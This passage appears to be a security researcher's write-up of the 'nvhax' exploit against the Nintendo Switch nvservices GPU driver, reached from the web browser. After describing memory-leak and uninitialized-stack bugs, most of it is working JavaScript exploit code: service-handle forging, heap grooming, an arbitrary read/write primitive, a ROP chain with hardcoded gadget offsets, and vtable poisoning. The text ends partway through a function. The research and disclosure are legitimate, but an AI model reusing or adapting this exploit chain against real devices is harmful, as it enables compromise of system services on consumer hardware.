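var GPCS = 1, TPCS_PER_GPC = 2, SMS_PER_TPC = 2;
var WARPS_PER_SM = 128, THREADS_PER_WARP = 32;

var total_sms = GPCS * TPCS_PER_GPC * SMS_PER_TPC;             // 4 SMs total
var max_threads = total_sms * WARPS_PER_SM * THREADS_PER_WARP; // 16384 threads

// Only TPC0 is reported, so the ioctl writes one warpstate struct
// (3 u64 fields = 24 bytes) per SM of that TPC:
var reply_size = SMS_PER_TPC * (3 * 8); // 48 bytes
```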
You can find it in Tegra's source code here: https://github.com/arter97/android_kernel_nvidia_shieldtablet/blob/master/drivers/gpu/nvgpu/gk20a/ctrl_gk20a.c#L398

As you can see, it builds a warpstate struct with the information and calls copy_to_user using pwarpstate as the destination address.
Since dealing directly with memory pointers from other processes is incompatible with the Switch's OS design, most ioctl commands were modified to take "in-line" arguments instead. However, NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE was somehow forgotten and kept the original memory pointer based approach.

What this means in practice is that we now have an ioctl command that tries to copy data directly using a memory pointer provided by the browser! However, since any pointer we pass from the browser is only valid in the browser's own address space, we need to leak memory from the nvservices system module to turn this into something even remotely useful.
Upon realizing this, I recalled the other bug I had found and tried passing the pointer it leaked to NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE. As expected, I no longer got a crash; instead, the command completed successfully!

Unfortunately, NVMAP_IOC_FREE leaks a pointer to a memory container allocated by nvservices using transfer memory. This means that, while the leaked address is valid in nvservices's memory space, it is impossible to find out where the actual system module's sections are located because transfer memory is also subject to ASLR.

At this point, I decided to share the bug with plutoo and we began discussing potential ways to use it for further exploitation.

As I mentioned before, every time a session is initiated with the nvdrv service family, the client must call the IPC command Initialize and this command requires the client to allocate and submit a kind of memory container that the Switch calls Transfer Memory.
Transfer memory is allocated with SVC 0x15 (svcCreateTransferMemory), which returns a handle that the client process can send over to other processes, which can in turn use it to map that memory into their own address space. When this is done, the memory range that backs the transfer memory becomes inaccessible to the client process until the other process releases it.
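As a purely illustrative toy model (the real behavior is enforced by the kernel, and all names here are mine), the lifecycle looks like this:

```javascript
// Toy model of the transfer memory lifecycle described above.
// Purely illustrative; nothing here reflects real SVC internals.
function TransferMemory(size) {
    this.size = size;
    this.state = "owned"; // client can still touch the backing range
}
TransferMemory.prototype.map = function() {
    this.state = "mapped"; // mapped by the server; range is now
};                         // inaccessible to the client
TransferMemory.prototype.release = function() {
    this.state = "owned"; // server unmapped it; client regains access
};

var tmem = new TransferMemory(0x300000);
tmem.map();     // nvservices maps it during Initialize
tmem.release(); // tearing down the session hands the range back,
                // contents included
```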

A few days pass and plutoo has an idea: what if you destroy the service session with nvdrv:a and dump the memory range that backs the transfer memory sent over with the Initialize command?
And that's how the Transfer Memory leak or transfermeme bug was found. You can find a more detailed write-up on this bug from daeken, who also found the same bug independently, here: https://daeken.svbtle.com/nintendo-switch-nvservices-info-leak

With this new memory leak in hand I tried to blindly pass some pointers to NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE and got mixed results (crashes, device interfaces not working anymore, etc.). But when I tried to pass the pointer leaked by NVMAP_IOC_FREE and dump the transfer memory afterwards, I could see that some data had changed.
As it turns out, the pointer leaked by NVMAP_IOC_FREE belongs to the transfer memory region and we can now use this to find out exactly what is being written by NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE and where.
As expected, a total of 48 bytes were being written which, if you recall, is exactly the combined size of 2 warpstate structs (one for each SM). However, to my surprise, the contents had nothing to do with the "warps" and they kept changing on subsequent calls.
That's right, the warpstate structs were not initialized on nvservices's side, so we now have a 48-byte stack leak as well!
While this may sound convenient, it ended up being a massive pain in the ass due to how unstable the stack contents could be. But, of course, where there's a will, there's a way...
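Pinpointing exactly what the ioctl writes (and where) boils down to diffing two dumps of the transfer memory region, taken before and after the call. A minimal standalone sketch of that comparison (a toy helper of my own, not PegaSwitch code):

```javascript
// Given two byte-array snapshots of the same memory region, return
// the [start, end) range of bytes that changed, or null if the
// snapshots are identical. Running this over transfer memory dumps
// taken before/after the ioctl is what reveals the 48 modified bytes.
function diffRange(before, after) {
    var start = -1, end = -1;
    for (var i = 0; i < before.length; i++) {
        if (before[i] !== after[i]) {
            if (start < 0) start = i;
            end = i + 1;
        }
    }
    return start < 0 ? null : [start, end];
}
```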

The Exploit


Exploiting these bugs was very tricky...
The first idea I came up with was to try coping with the unreliable contents of the semi-arbitrary write from NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE and just corrupt different objects that I could see inside the leaked transfer memory region. This had very limited results and led nowhere.
Luckily, by now, plutoo, derrek, naehrwert and yellows8 had succeeded in exploiting the Switch using a top-down approach: the famous glitch attack that went on to be presented at 34C3. So, with the actual nvservices binary now in hand, we could finally plan a proper exploit chain.

Working with plutoo, we found out that other ioctl commands could change the stack contents semi-predictably and we came up with this:

sploitcore.prototype.break_nvdrv = function(sm_handle) {
var meminfo = this.malloc(0x20);
var pageinfo = this.malloc(0x8);
// Leak nvservices base address
var nvdrv_base = this.get_nvdrv_base(sm_handle);
// Forge a new service handle for NVDRV
var srv_handle = this.forge_handle(sm_handle, "nvdrv:t");
// Initialize NVDRV
var init_res = this.nvdrv_init(srv_handle, 0x300000, 0, 0);
var nvdrv_buf = init_res[0];
var mem_addr = init_res[1];
// Open "/dev/nvhost-ctrl-gpu"
var ctrlgpu_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvhost-ctrl-gpu");
// Open "/dev/nvhost-as-gpu"
var as_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvhost-as-gpu");
// Open "/dev/nvmap"
var nvmap_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvmap");
// Open "/dev/nvhost-ctrl"
var ctrl_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvhost-ctrl");
// Open "/dev/nvhost-gpu"
var gpu_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvhost-gpu");
// Open "/dev/nvdisp-disp0"
var disp_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvdisp-disp0");
// Leak pointer from nvmap
var sharedmem_ptr = this.nvdrv_sharedmem_leak(nvdrv_buf, nvmap_dev_handle);
// Create new nvmap handle
var nvmap_handle = this.nvmap_alloc(nvdrv_buf, nvmap_dev_handle, [0, 0], 0x10000);
// Initialize a new NVGPU unit
this.nvdrv_init_gpu(nvdrv_buf, gpu_dev_handle, as_dev_handle, nvmap_dev_handle, nvmap_handle);
// Disable SM stopping
this.nvdrv_disable_sm_stop(nvdrv_buf, ctrlgpu_dev_handle, gpu_dev_handle);
// Setup write targets
var spray_ptr = utils.add2(nvdrv_base, 0xB4DB4);
var target_ptr0 = utils.add2(nvdrv_base, 0x63AFD1);
var target_ptr1 = utils.add2(nvdrv_base, 0x111618 - 0x18);
// Overwrite RMOS_SET_PRODUCTION_MODE to enable debug features
this.nvdrv_wait_for_pause(nvdrv_buf, ctrlgpu_dev_handle, target_ptr0, 0x01);
// Submit GPFIFO to plant data in shared memory
// Contents will be at sharedmem_ptr + 0x31000
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, utils.add2(nvdrv_base, 0xC4D5C)); // Pointer to SVC 0x55
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, [0x00000000, 0x00000000]); // Must be NULL
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, [0x42424242, 0x42424242]);
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, [0x00001000, 0x00000000]); // SVC 0x55 X2 (io_map_size)
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, utils.add2(nvdrv_base, 0xBB384)); // Pointer to memcpy (RET)
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, [0x42424242, 0x42424242]);
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, utils.add2(nvdrv_base, 0xB4DB4)); // Pointer to stack pivot
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, [0x00000000, 0x00000000]); // Must be NULL
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, [0x42424242, 0x42424242]);
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, [0x42424242, 0x42424242]);
// Open "/dev/nvhost-dbg-gpu"
var dbg_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvhost-dbg-gpu");
// Bind debugger to a GPU channel
this.nvdrv_dbg_bind(nvdrv_buf, dbg_dev_handle, gpu_dev_handle);
// Overwrite dbg-gpu funcptr
this.nvdrv_zbc_query_table(nvdrv_buf, ctrlgpu_dev_handle, spray_ptr);
this.nvdrv_wait_for_pause(nvdrv_buf, ctrlgpu_dev_handle, target_ptr1, 0x01);
// Do ROP
this.nvdrv_do_rop(nvdrv_buf, dbg_dev_handle, nvdrv_base, sharedmem_ptr);
// Close the handle
this.svc(0x16, [srv_handle], false);
// Set dummy memory state
var mem_state = [0x00, 0x01];
// Wait for nvservices to release memory
while (mem_state[1])
{
// Call QueryMem
this.svc(0x06, [meminfo, pageinfo, mem_addr], false);
// Read state
mem_state = this.read8(meminfo, 0x10 >> 2);
}
// Dump memory
this.memdump(utils.add2(mem_addr, 0x2D000), 0x30, "memdumps/nvmem.bin");
this.free(meminfo);
this.free(pageinfo);
}
As you can see, we use the NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE bug as-is (due to the last byte being almost always 0) to overwrite the RMOS_SET_PRODUCTION_MODE flag. This allows the browser to access the debug-only /dev/nvhost-dbg-gpu and /dev/nvhost-prof-gpu device interfaces and use previously inaccessible ioctl commands.
This was particularly useful for gaining access to NVGPU_DBG_GPU_IOCTL_REG_OPS, which could be used to plant a nice ROP chain inside the transfer memory. However, pivoting the stack still required some level of control over the stack contents for the NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE bug to work.
Many other similar methods could be used as well, but they all ran into the same issue: the NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE bug was just too unreliable.

Some weeks pass and SciresM comes up with an insane yet brilliant way of exploiting this:

/*
nvhax exploit
*/
// Global nvservices exploit context
sploitcore.prototype.nvdrv_exp_ctx = {};
sploitcore.prototype.spawn_nvdrv_srv = function(sm_handle, transf_mem_addr, transf_mem_size) {
// Forge a new service handle for NVDRV
var srv_handle = this.forge_handle(sm_handle, "nvdrv:t");
// Initialize NVDRV
var init_res = this.nvdrv_init(srv_handle, transf_mem_size, 0, transf_mem_addr);
var nvdrv_buf = init_res[0];
var mem_addr = init_res[1];
// Open "/dev/nvhost-gpu"
var gpu_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvhost-gpu");
return [srv_handle, nvdrv_buf, mem_addr, gpu_dev_handle];
}
sploitcore.prototype.destroy_nvdrv_srv = function(sm_handle, srv_handle, mem_addr, meminfo, pageinfo) {
// Close the handle
this.svc(0x16, [srv_handle], false);
// Set dummy memory state
var mem_state = [0x00, 0x01];
// Wait for nvservices to release memory
while (mem_state[1])
{
// Call QueryMem
this.svc(0x06, [meminfo, pageinfo, mem_addr], false);
// Read state
mem_state = this.read8(meminfo, 0x10/4);
}
}
sploitcore.prototype.leak_nvdrv_srv = function(sm_handle, mem_size, meminfo, pageinfo) {
// Spawn leaker service
var nvdrv_res = this.spawn_nvdrv_srv(sm_handle, 0, 0x100000);
var srv_handle = nvdrv_res[0];
var nvdrv_buf = nvdrv_res[1];
var mem_addr = nvdrv_res[2];
// Destroy leaker service
this.destroy_nvdrv_srv(sm_handle, srv_handle, mem_addr, meminfo, pageinfo);
// Leak out base address
var nvmem_base_addr = this.read8(mem_addr, 0x8008/4);
if (mem_size == 0x01)
nvmem_base_addr = utils.add2(nvmem_base_addr, -0x8000);
else if (mem_size == 0x08)
nvmem_base_addr = utils.add2(nvmem_base_addr, -0xC000);
else if (mem_size == 0x40)
nvmem_base_addr = utils.add2(nvmem_base_addr, -0x2B000);
this.free(mem_addr);
return nvmem_base_addr;
}
sploitcore.prototype.install_nvdrv_rw = function() {
var sm_handle = this.nvdrv_exp_ctx[0];
var meminfo = this.malloc(0x40);
var pageinfo = this.malloc(0x10);
// Spawn first service
var nvdrv_obj0 = this.spawn_nvdrv_srv(sm_handle, 0, 0x100000);
var obj0_srv_handle = nvdrv_obj0[0];
var obj0_nvdrv_buf = nvdrv_obj0[1];
var obj0_mem_addr = nvdrv_obj0[2];
var obj0_gpu_dev_handle = nvdrv_obj0[3];
// Open "/dev/nvhost-gpu"
var gpu_dev_handle = this.nvdrv_open(obj0_nvdrv_buf, "/dev/nvhost-gpu");
// Destroy first service
this.destroy_nvdrv_srv(sm_handle, obj0_srv_handle, obj0_mem_addr, meminfo, pageinfo);
// Find the nvhost channel's address
var nvhost_channel_addr = this.read8(obj0_mem_addr, 0xC000/4);
utils.log('nvhost_channel_addr: ' + utils.paddr(nvhost_channel_addr));
this.free(obj0_mem_addr);
// Spawn second service
var nvdrv_obj1 = this.spawn_nvdrv_srv(sm_handle, 0, 0x100000);
var nvdrv_obj1_addr = this.leak_nvdrv_srv(sm_handle, 1, meminfo, pageinfo);
var obj1_srv_handle = nvdrv_obj1[0];
var obj1_nvdrv_buf = nvdrv_obj1[1];
var obj1_mem_addr = nvdrv_obj1[2];
var obj1_gpu_dev_handle = nvdrv_obj1[3];
utils.log('nvdrv_obj1_addr: ' + utils.paddr(nvdrv_obj1_addr));
// Set dummy address for obj1
this.nvdrv_gpu_set_user_addr(obj1_nvdrv_buf, obj1_gpu_dev_handle, [0x12345678, 0x87654321]);
var malTries = 0;
var malBuf = this.malloc(0x4000000);
var malBase;
this.write4(0x41424344, malBuf, 0x80/4);
// Craft transfer memory
for (var i = 0x50000; i < 0x4000000; i += 0x10000) {
var hwctx = utils.add2(nvdrv_obj1_addr, 0);
var rwaddr = utils.add2(nvdrv_obj1_addr, 0xC008 - 0x78);
this.write4(nvhost_channel_addr[0], malBuf, (0x00 + i)/4);
this.write4(nvhost_channel_addr[1], malBuf, (0x04 + i)/4);
this.write4(rwaddr[0], malBuf, (0x08 + i)/4);
this.write4(rwaddr[1], malBuf, (0x0C + i)/4);
}
// Do 64MB allocations until high byte is 00
while (true) {
var nvdrv_obj2 = this.spawn_nvdrv_srv(sm_handle, malBuf, 0x4000000);
var obj2_srv_handle = nvdrv_obj2[0];
var obj2_nvdrv_buf = nvdrv_obj2[1];
var obj2_mem_addr = nvdrv_obj2[2];
var obj2_gpu_dev_handle = nvdrv_obj2[3];
malBase = this.leak_nvdrv_srv(sm_handle, 0x40, meminfo, pageinfo);
malTries++;
utils.log('Allocated 64MB at ' + utils.paddr(malBase));
if (malBase[1] == 0 && malBase[0] <= 0xfc000000)
break;
this.destroy_nvdrv_srv(sm_handle, obj2_srv_handle, obj2_mem_addr, meminfo, pageinfo);
this.free(obj2_mem_addr);
}
utils.log('Final malobj at ' + utils.paddr(malBase) + ' after ' + malTries + ' tries');
var loBound = malBase[0] + 0x50000 - 0x10000;
var hiBound = malBase[0] + 0x4000000 - 0x20000;
var vicTries = 0;
var vicBuf = this.malloc(0x800000);
var vicBase;
// Force GC
this.gc();
// Do 8MB allocations until it overlaps
while (true) {
var nvdrv_obj3 = this.spawn_nvdrv_srv(sm_handle, vicBuf, 0x800000);
var obj3_srv_handle = nvdrv_obj3[0];
var obj3_nvdrv_buf = nvdrv_obj3[1];
var obj3_mem_addr = nvdrv_obj3[2];
var obj3_gpu_dev_handle = nvdrv_obj3[3];
vicBase = this.leak_nvdrv_srv(sm_handle, 0x08, meminfo, pageinfo);
vicTries++;
utils.log('Allocated 8MB at ' + utils.paddr(vicBase));
if (vicBase[0] >= loBound && vicBase[0] < hiBound)
break;
this.destroy_nvdrv_srv(sm_handle, obj3_srv_handle, obj3_mem_addr, meminfo, pageinfo);
this.free(obj3_mem_addr);
}
var rop_base = utils.add2(vicBase, 0x400000);
utils.log('Final malobj at ' + utils.paddr(malBase) + ' after ' + malTries + ' tries');
utils.log('Final vicobj at ' + utils.paddr(vicBase) + ' after ' + vicTries + ' tries');
utils.log('Target object at ' + utils.paddr([vicBase[0] + 0x10000, 0]));
utils.log('Offset + 0x' + (vicBase[0] - malBase[0]).toString(16));
// Spawn last object
var nvdrv_obj4 = this.spawn_nvdrv_srv(sm_handle, 0, 0x100000);
var obj4_srv_handle = nvdrv_obj4[0];
var obj4_nvdrv_buf = nvdrv_obj4[1];
var obj4_mem_addr = nvdrv_obj4[2];
var obj4_gpu_dev_handle = nvdrv_obj4[3];
// Open "/dev/nvhost-ctrl-gpu"
var gpu_ctrl_dev_handle = this.nvdrv_open(obj4_nvdrv_buf, "/dev/nvhost-ctrl-gpu");
// Overwrite pointer with 00
var target_addr = utils.add2(vicBase, 0xF000 + 4);
this.nvdrv_wait_for_pause(obj4_nvdrv_buf, gpu_ctrl_dev_handle, target_addr, 0x01);
// Read back the user address of obj3
var user_addr = this.nvdrv_gpu_get_user_addr(obj3_nvdrv_buf, obj3_gpu_dev_handle);
utils.log('user addr ' + utils.paddr(user_addr));
// Write obj2's address into forged buffer
var test_addr_lo = malBase[0] + 0x80 - 0x78;
var test_addr_hi = malBase[1];
this.nvdrv_gpu_set_user_addr(obj3_nvdrv_buf, obj3_gpu_dev_handle, [test_addr_lo, test_addr_hi]);
// Read back from forged buffer
user_addr = this.nvdrv_gpu_get_user_addr(obj1_nvdrv_buf, obj1_gpu_dev_handle);
utils.log('user addr ' + utils.paddr(user_addr));
// Free memory
this.free(meminfo);
this.free(pageinfo);
// Initialize RW context
this.nvdrv_exp_ctx[2] = obj3_nvdrv_buf;
this.nvdrv_exp_ctx[3] = obj3_gpu_dev_handle;
this.nvdrv_exp_ctx[4] = obj1_nvdrv_buf;
this.nvdrv_exp_ctx[5] = obj1_gpu_dev_handle;
this.nvdrv_exp_ctx[6] = rop_base;
}
sploitcore.prototype.read_nvdrv_mem = function(mem_addr) {
// Unwrap RW context
var obj0_nvdrv_buf = this.nvdrv_exp_ctx[2];
var obj0_gpu_dev_handle = this.nvdrv_exp_ctx[3];
var obj1_nvdrv_buf = this.nvdrv_exp_ctx[4];
var obj1_gpu_dev_handle = this.nvdrv_exp_ctx[5];
var mem_addr_ptr = utils.add2(mem_addr, -0x78);
var mem_addr_ptr_lo = mem_addr_ptr[0];
var mem_addr_ptr_hi = mem_addr_ptr[1];
// Set the target address
this.nvdrv_gpu_set_user_addr(obj0_nvdrv_buf, obj0_gpu_dev_handle, [mem_addr_ptr_lo, mem_addr_ptr_hi]);
// Read the data
var nvdrv_mem = this.nvdrv_gpu_get_user_addr(obj1_nvdrv_buf, obj1_gpu_dev_handle);
return [nvdrv_mem[0], nvdrv_mem[1]];
}
sploitcore.prototype.write_nvdrv_mem = function(mem_addr, mem_val) {
// Unwrap RW context
var obj0_nvdrv_buf = this.nvdrv_exp_ctx[2];
var obj0_gpu_dev_handle = this.nvdrv_exp_ctx[3];
var obj1_nvdrv_buf = this.nvdrv_exp_ctx[4];
var obj1_gpu_dev_handle = this.nvdrv_exp_ctx[5];
var mem_addr_ptr = utils.add2(mem_addr, -0x78);
var mem_addr_ptr_lo = mem_addr_ptr[0];
var mem_addr_ptr_hi = mem_addr_ptr[1];
// Set the target address
this.nvdrv_gpu_set_user_addr(obj0_nvdrv_buf, obj0_gpu_dev_handle, [mem_addr_ptr_lo, mem_addr_ptr_hi]);
// Write the data
var mem_val_lo = mem_val[0];
var mem_val_hi = mem_val[1];
this.nvdrv_gpu_set_user_addr(obj1_nvdrv_buf, obj1_gpu_dev_handle, [mem_val_lo, mem_val_hi]);
}
sploitcore.prototype.build_nvdrv_rop = function() {
var nvdrv_base = this.nvdrv_exp_ctx[1];
var rop_base = this.nvdrv_exp_ctx[6];
var rop_buf = utils.add2(rop_base, 0x80000);
utils.log('rop_buf: '+ utils.paddr(rop_buf));
// Gadgets
var channel_to_base = utils.add2(nvdrv_base, 0x61d910);
var store_return_branch_a8 = utils.add2(nvdrv_base, 0x2234);
var br_38 = utils.add2(nvdrv_base, 0x7F174);
var add_x8_br_x2 = utils.add2(nvdrv_base, 0xBFFF0);
var add_x8_adj = 0x608;
var ldr_blr_x9 = utils.add2(nvdrv_base, 0x7B20C);
var partial_load = utils.add2(nvdrv_base, 0xB4DAC);
var shuffle_x0_x8 = utils.add2(nvdrv_base, 0x7CCB8);
var store_branch_60 = utils.add2(nvdrv_base, 0x2E6CC);
var ldr_br_x1 = utils.add2(nvdrv_base, 0x2244);
var save = utils.add2(nvdrv_base, 0xB2328);
var ldr_x0_ret = utils.add2(nvdrv_base, 0xC180C);
var load = utils.add2(nvdrv_base, 0xB4D74);
var br_x16 = utils.add2(nvdrv_base, 0x334);
var ldr_x19_ret = utils.add2(nvdrv_base, 0x7635C);
var str_x20 = utils.add2(nvdrv_base, 0x8890);
var str_x8_x19 = utils.add2(nvdrv_base, 0x40224);
var str_x0_x19 = utils.add2(nvdrv_base, 0x47154);
var str_x2_x19 = utils.add2(nvdrv_base, 0x4468C);
var ldr_x8_str_0_x19 = utils.add2(nvdrv_base, 0xBDFB8);
var blr_x8_ret = utils.add2(nvdrv_base, 0xF07C);
var ldr_x2_str_x1_x2 = utils.add2(nvdrv_base, 0x11B18);
var ldr_x8_ldr_X1_br_x1 = utils.add2(nvdrv_base, 0x7CDB0);
var refresh_x19_x20 = utils.add2(nvdrv_base, 0x7D0);
var magic_copy_fuckery = utils.add2(nvdrv_base, 0xE548);
var return_address = utils.add2(nvdrv_base, 0x46B0);
// Pointers
var vtable = utils.add2(rop_buf, 0x1000);
var vtable2 = utils.add2(rop_buf, 0x2000);
var pl_buf1 = utils.add2(rop_buf, 0x3000);
var pl_buf2 = utils.add2(rop_buf, 0x4000);
var save_buf = utils.add2(rop_buf, 0x6000);
var store_sp = utils.add2(rop_buf, 0x7000);
var vtable_save = utils.add2(rop_buf, 0x8000);
var load_buf = utils.add2(rop_buf, 0x9000);
var sp = utils.add2(rop_buf, 0x20000);
this.write_nvdrv_mem(rop_buf, vtable);
this.write_nvdrv_mem(utils.add2(vtable, 0x08), store_return_branch_a8);
this.write_nvdrv_mem(utils.add2(vtable, 0x28), store_return_branch_a8);
this.write_nvdrv_mem(utils.add2(vtable, 0x38), add_x8_br_x2);
this.write_nvdrv_mem(utils.add2(vtable, 0xA8), br_38);
this.write_nvdrv_mem(utils.add2(vtable, add_x8_adj), pl_buf1);
this.write_nvdrv_mem(utils.add2(vtable, add_x8_adj + 8), ldr_blr_x9);
this.write_nvdrv_mem(utils.add2(vtable, add_x8_adj + 0xF8), utils.add2(store_sp, 0x10));
this.write_nvdrv_mem(utils.add2(vtable, add_x8_adj + 0x100), br_38);
this.write_nvdrv_mem(pl_buf1, vtable2);
this.write_nvdrv_mem(utils.add2(pl_buf1, 8), partial_load);
this.write_nvdrv_mem(vtable2, pl_buf2);
this.write_nvdrv_mem(utils.add2(vtable2, 0x38), shuffle_x0_x8);
this.write_nvdrv_mem(pl_buf2, save_buf);
this.write_nvdrv_mem(utils.add2(save_buf, 0x28), store_branch_60);
this.write_nvdrv_mem(utils.add2(pl_buf2, 0x60), partial_load);
this.write_nvdrv_mem(utils.add2(pl_buf2, 0xF8), sp);
this.write_nvdrv_mem(utils.add2(pl_buf2, 0x100), ldr_br_x1);
this.write_nvdrv_mem(save_buf, vtable_save);
this.write_nvdrv_mem(vtable_save, save);
this.write_nvdrv_mem(utils.add2(sp, 0x8), ldr_x0_ret);
sp = utils.add2(sp, 0x10);
// Save
this.write_nvdrv_mem(utils.add2(sp, 0x08), load_buf);
this.write_nvdrv_mem(utils.add2(sp, 0x18), load);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x08), ldr_x19_ret);
sp = utils.add2(sp, 0x10);
// Cleanup
var hax_buf = utils.add2(rop_buf, 0x10000);
var dump_buf = utils.add2(rop_buf, 0x11000);
this.write_nvdrv_mem(utils.add2(sp, 0x00), utils.add2(hax_buf, -0x1A8));
this.write_nvdrv_mem(utils.add2(sp, 0x18), str_x20);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x08), utils.add2(hax_buf, -0x8));
this.write_nvdrv_mem(utils.add2(sp, 0x18), str_x8_x19);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x00), utils.add2(hax_buf, 0x10));
this.write_nvdrv_mem(utils.add2(sp, 0x18), str_x0_x19);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x00), utils.add2(hax_buf, -0x90));
this.write_nvdrv_mem(utils.add2(sp, 0x18), str_x2_x19);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x08), utils.add2(hax_buf, 0x100));
this.write_nvdrv_mem(utils.add2(sp, 0x18), ldr_x8_str_0_x19);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x08), ldr_x2_str_x1_x2);
this.write_nvdrv_mem(utils.add2(sp, 0x28), blr_x8_ret);
sp = utils.add2(sp, 0x30);
this.write_nvdrv_mem(utils.add2(sp, 0x00), utils.add2(hax_buf, 0x20));
sp = utils.add2(sp, 0x10);
this.write_nvdrv_mem(utils.add2(sp, 0x8), ldr_x0_ret);
sp = utils.add2(sp, 0x10);
this.write_nvdrv_mem(utils.add2(sp, 0x08), dump_buf);
this.write_nvdrv_mem(utils.add2(sp, 0x18), ldr_x8_ldr_X1_br_x1);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(dump_buf, dump_buf);
this.write_nvdrv_mem(utils.add2(dump_buf, 0x8), save);
this.write_nvdrv_mem(utils.add2(sp, 0x18), ldr_x0_ret);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x08), save_buf);
this.write_nvdrv_mem(utils.add2(sp, 0x18), refresh_x19_x20);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x0), utils.add2(utils.add2(store_sp, 0x00), -0x70));
this.write_nvdrv_mem(utils.add2(sp, 0x8), utils.add2(utils.add2(save_buf, 0xF8), -0x08));
this.write_nvdrv_mem(utils.add2(sp, 0x18), magic_copy_fuckery);
sp = utils.add2(sp, 0x20);
// Fix SP
this.write_nvdrv_mem(utils.add2(sp, 0x70), utils.add2(utils.add2(hax_buf, 0x180), -0x70));
this.write_nvdrv_mem(utils.add2(sp, 0x78), utils.add2(utils.add2(save_buf, 0x100), -0x08));
this.write_nvdrv_mem(utils.add2(sp, 0x88), magic_copy_fuckery);
sp = utils.add2(sp, 0x90);
// Fix LR
this.write_nvdrv_mem(utils.add2(hax_buf, 0x180), return_address);
this.write_nvdrv_mem(utils.add2(sp, 0x70), utils.add2(utils.add2(hax_buf, 0x190), -0x70));
this.write_nvdrv_mem(utils.add2(sp, 0x78), utils.add2(utils.add2(save_buf, 0x0), -0x08));
this.write_nvdrv_mem(utils.add2(sp, 0x88), magic_copy_fuckery);
sp = utils.add2(sp, 0x90);
// Fix X0
this.write_nvdrv_mem(utils.add2(hax_buf, 0x188), [0xCAFE, 0x0]);
this.write_nvdrv_mem(utils.add2(sp, 0x88), load);
sp = utils.add2(sp, 0x90);
}
sploitcore.prototype.build_nvdrv_call_obj = function() {
var sm_handle = this.nvdrv_exp_ctx[0];
var nvdrv_base = this.nvdrv_exp_ctx[1];
var rop_base = this.nvdrv_exp_ctx[6];
var rop_buf = utils.add2(rop_base, 0x80000);
// Find the heap
var heap_ptr = this.read_nvdrv_mem(utils.add2(nvdrv_base, 0x5CD0D0));
var heap_magic = this.read_nvdrv_mem(heap_ptr);
if (heap_magic[0] != 0x45585048)
utils.log("Failed to find heap magic!");
else
utils.log("Heap magic found!");
var cur_recent = this.read_nvdrv_mem(utils.add2(heap_ptr, 0x80));
// Spawn call object
var nvdrv_res = this.spawn_nvdrv_srv(sm_handle, 0, 0x100000);
var call_recent = this.read_nvdrv_mem(utils.add2(heap_ptr, 0x80));
if (cur_recent[0] == call_recent[0])
utils.log("Failed to find call object!");
else
utils.log("Call object found!");
var ud_magic = this.read_nvdrv_mem(call_recent);
if (ud_magic[0] != 0x5544)
utils.log("Call object memchunk is freed!");
else
utils.log("Call object memchunk is valid!");
var call_vtable_addr = utils.add2(call_recent, 0x20);
var old_vtable = this.read_nvdrv_mem(call_vtable_addr);
var call_vtable_buf_addr = utils.add2(rop_base, 0x98000);
this.write_nvdrv_mem(call_vtable_addr, call_vtable_buf_addr);
// Copy vtable contents
for (var i = 0; i < 0x200; i += 0x8) {
var obj_temp = this.read_nvdrv_mem(utils.add2(old_vtable, i));
this.write_nvdrv_mem(utils.add2(call_vtable_buf_addr, i), obj_temp);
}
// Gadgets for vtable
var br_38 = utils.add2(nvdrv_base, 0x7F174);
var shuffle_x0_x8 = utils.add2(nvdrv_base, 0x7CCB8);
var add_x8_br_x2 = utils.add2(nvdrv_base, 0xBFFF0);
var add_x8_adj = 0x608;
// Poison vtable
this.write_nvdrv_mem(utils.add2(call_vtable_buf_addr, 0x20), br_38); // Open
this.write_nvdrv_mem(utils.add2(call_vtable_buf_addr, 0x38), add_x8_br_x2);
this.write_nvdrv_mem(utils.add2(call_vtable_buf_addr, add_x8_adj + 8), shuffle_x0_x8);
this.write_nvdrv_mem(utils.add2(call_vtable_buf_addr, add_x8_adj), rop_buf); // Poison **obj
return nvdrv_res;
}
sploitcore.prototype.do_nvdrv_memcpy_in = function(dst, src, size) {
var memcpy = this.bridge(0x44338C, types.int, types.void_p, types.void_p, types.int);
// Unwrap call context
var sm_handle = this.nvdrv_exp_ctx[0];
var tmp_buf = this.nvdrv_exp_ctx[8];
var tmp_buf_size = this.nvdrv_exp_ctx[9];
var meminfo = this.malloc(0x40);
var pageinfo = this.malloc(0x10);
// Get temp buffer address
var tmp_buf_addr = utils.add2(tmp_buf, 0x100000);
// Copy in the data
